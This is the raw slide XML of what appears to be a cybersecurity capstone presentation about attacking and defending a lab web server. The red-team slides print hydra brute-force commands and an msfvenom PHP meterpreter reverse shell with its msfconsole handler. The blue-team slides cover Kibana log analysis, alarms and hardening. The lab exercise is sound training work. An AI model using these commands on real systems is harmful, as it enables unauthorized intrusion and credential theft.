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 Thin"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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Roboto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DC896B2-8EF9-48F2-8C6F-333312FBC8A6}">
  <a:tblStyle styleId="{FDC896B2-8EF9-48F2-8C6F-333312FBC8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RobotoMedium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RobotoLight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italic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId49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Thin-bold.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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97c12ad41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97c12ad41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Meterpreter to connect to uploaded web shell and Use shell to explore and compromise target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Leveraging the RCE allows us to open a Meterpreter shell to the target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Once on the target, the full file system is available for exploration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Achieving a shell on the target allows us to view all files and capture the flag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time did the port scan occur?</a:t>
            </a:r>
            <a:endParaRPr b="1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23:00</a:t>
            </a:r>
            <a:b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groups of many packets were sent and from which IP? </a:t>
            </a:r>
            <a:endParaRPr b="1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Resting the courser at the top of the arc, we can see </a:t>
            </a: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19,407 </a:t>
            </a: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the second chart we can see it’s the IP address </a:t>
            </a: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192.168.1.90</a:t>
            </a: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9b2c1e48c2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9b2c1e48c2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top three hits for directories and files that were requested were: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●"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http://192.168.1.105/company_folder/secret_folder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●"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http://192.168.1.105/webdav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●"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http://192.168.1.105/webdav/control.php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9b2c1e48c2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9b2c1e48c2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top three hits for directories and files that were requested were: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●"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http://192.168.1.105/company_folder/secret_folder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●"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http://192.168.1.105/webdav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●"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http://192.168.1.105/webdav/control.php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9b2c1e48c2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9b2c1e48c2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The image is an example of hydra failing to access the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="E01E5A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>secret_folder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  directory.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9b2c1e48c2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9b2c1e48c2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logs contain evidence of a large number of requests for the sensitive data. Only 1 request were successful.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is a telltale signature of a brute-force attack. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-168275" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1D1C1D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Crack stolen credentials to connect via WebDAV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Generate custom web shell with msfconsole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Upload shell via WebDAV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50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6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image" Target="../media/image5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4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49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60.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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91.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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96.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Remote Code Execution </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134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msfconsole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exploit/multi/handler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Set payload php/meterpreter/reverse_tcp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set LHOST 192.168.1.90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set LPORT  4444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exploit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cat flag.txt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7" name="Google Shape;1137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8" name="Google Shape;1138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9" name="Google Shape;113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0" name="Google Shape;1140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1" name="Google Shape;114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2" name="Google Shape;114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3" name="Google Shape;1143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Upload a PHP reverse shell payload.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Execute payload on WebDAV server to open up a meterpreter session.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5" name="Google Shape;1145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6" name="Google Shape;114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7" name="Google Shape;114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8" name="Google Shape;1148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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429675" y="14315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0" name="Google Shape;1150;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="4489" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="2864600"/>
            <a:ext cx="5676900" cy="17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63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23047" l="0" r="25350" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5588900" y="630000"/>
            <a:ext cx="3507475" cy="22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63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3828" l="0" r="15254" t="88319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315900" y="4693325"/>
            <a:ext cx="4780475" cy="4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[SSH ]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158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6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64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ssh vagrant@192.168.1.105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sudo su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cd ..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ls -a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cat flag.txt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1" name="Google Shape;1161;p6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62" name="Google Shape;1162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3" name="Google Shape;1163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4" name="Google Shape;1164;p6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65" name="Google Shape;1165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6" name="Google Shape;1166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7" name="Google Shape;1167;p6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6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granted access to vagrant files      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==&gt;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granted access to root and found the flag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9" name="Google Shape;1169;p6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70" name="Google Shape;1170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1" name="Google Shape;1171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2" name="Google Shape;1172;p6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3" name="Google Shape;1173;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="28540" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835675" y="1473925"/>
            <a:ext cx="3230450" cy="33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64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="36628" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="3357400"/>
            <a:ext cx="2239426" cy="5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64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="32097" l="1122" r="61199" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496049" y="2880713"/>
            <a:ext cx="2239426" cy="3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Google Shape;118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65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2" name="Google Shape;1182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88" name="Google Shape;1188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0" name="Google Shape;119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6950"/>
            <a:ext cx="4648201" cy="46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533700"/>
            <a:ext cx="4648199" cy="46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97" name="Google Shape;1197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67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200" name="Google Shape;120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675975"/>
            <a:ext cx="8915399" cy="418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6" name="Google Shape;1206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8" name="Google Shape;12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" y="1144750"/>
            <a:ext cx="8632725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4" name="Google Shape;1214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69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6" name="Google Shape;12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333500"/>
            <a:ext cx="8586152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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="648325"/>
            <a:ext cx="7476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secret_folder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directory was requested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15,553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times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control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.php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file was requested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64 times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3" name="Google Shape;1223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0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5" name="Google Shape;122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" y="1394050"/>
            <a:ext cx="8895404" cy="32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1" name="Google Shape;123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71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3" name="Google Shape;123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1232625"/>
            <a:ext cx="8567099" cy="342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72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0" name="Google Shape;1240;p7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46" name="Google Shape;1246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73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Scan and identify  the traffic to machine/network. Search for open ports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Based on the # of Requests per second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10 request per second for more than 5 second</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248" name="Google Shape;1248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local firewall can be used to throttle incoming connections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ICMP traffic can be filtered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An IP whitelist can be enabled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54" name="Google Shape;1254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To set an alarm when anyone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> access this directory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1 (one) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a binary alarm: If the incoming IP is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> whitelisted, it fires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6" name="Google Shape;1256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Access to the sensitive file can be locally restricted to a specific user.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This way, someone who gets a shell as, e.g., www-data will not be able to read it.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 addition, the file should be encrypted at rest.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62" name="Google Shape;1262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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-67725" y="1702225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set an alarm when an account tried to access with wrong password more than 100  times. If results generated by the brute force attack with Hydra.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More than 100 requests per second for 5 seconds should trigger the alarm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64" name="Google Shape;1264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If 401 happens, to stop traffic from attacker IP for certain amount of time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Configuring fail2ban or a similar utility would mitigate brute force attacks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Block all incoming Hydra traffic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70" name="Google Shape;1270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7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Monitor access to webdav with Filebeat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Fire an alarm on any read performed on files within webdav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 (one)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1272" name="Google Shape;1272;p7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Block any access to shared folder through web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 PROPFIND request on the server: When WebDAV is enabled, it should return "HTTP/1.1 207 Multi-Status"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78" name="Google Shape;1278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77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Alarms should fire upon receipt of any POST request containing form or file data of a disallowed file type, e.g., .php.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To set an alarm if any traffic run  on port  4444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1 (one) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The alarm should fire whenever users upload a forbidden file.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80" name="Google Shape;1280;p7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Uninstall all unnecessary software. Each program may have a potential vulnerability that may allow the attacker to escalate the attack. Like compilers/interpreters, because they may enable the attacker to create reverse shells.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Write permissions can be restricted on the host.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Uploads can be isolated into a dedicated storage partition.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6922475" y="910475"/>
            <a:ext cx="21024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Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 192.168.1.1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 192.168.1.90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 Linux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 Kali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IPv4:192.168.1.105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 Linux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 Capstone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IPv4:192.168.1.100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 Linux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 ELK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75" y="533700"/>
            <a:ext cx="6571798" cy="43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{FDC896B2-8EF9-48F2-8C6F-333312FBC8A6}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Kibana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{FDC896B2-8EF9-48F2-8C6F-333312FBC8A6}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="51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990300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="-11430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 Data Exposure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1430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OWASP Top 10#3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Exposure of confidential Information to an Unauthorized Actor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attacker to access to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confidential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information.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exposure compromises credentials that attackers can use to break into the web server.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File Upload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575" marB="28575" marR="47625" marL="476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are allowed to upload arbitrary files to the web server.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remote file inclusion vulnerability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attackers to upload PHP scripts to the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Remote </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Code </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t> via Command Injection: OWASP Top 10 #1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28575" marB="28575" marR="47625" marL="476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DB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Execute reverse shell command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 allows attackers to open a reverse shell to the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[Sensitive Data Exposure]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nmap -sV 192.168.1.105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dirb to map URLs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Browser to explore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 -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder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Access to secret folder with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directory is password protected, but susceptible to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brute-force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Ashton’s log in credentials.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6" name="Google Shape;1106;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="28341" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5924550" y="2995638"/>
            <a:ext cx="3002297" cy="192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61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8189" l="0" r="51763" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000725" y="744900"/>
            <a:ext cx="2867026" cy="21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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  file upload ]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113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Msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt; control.php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6" name="Google Shape;1116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7" name="Google Shape;1117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8" name="Google Shape;1118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0" name="Google Shape;112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2" name="Google Shape;1122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Upload a PHP reverse shell payload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connect to server via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WebDAV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4" name="Google Shape;1124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5" name="Google Shape;112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6" name="Google Shape;112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7" name="Google Shape;1127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8" name="Google Shape;1128;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="35371" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5687350" y="887900"/>
            <a:ext cx="3456652" cy="4171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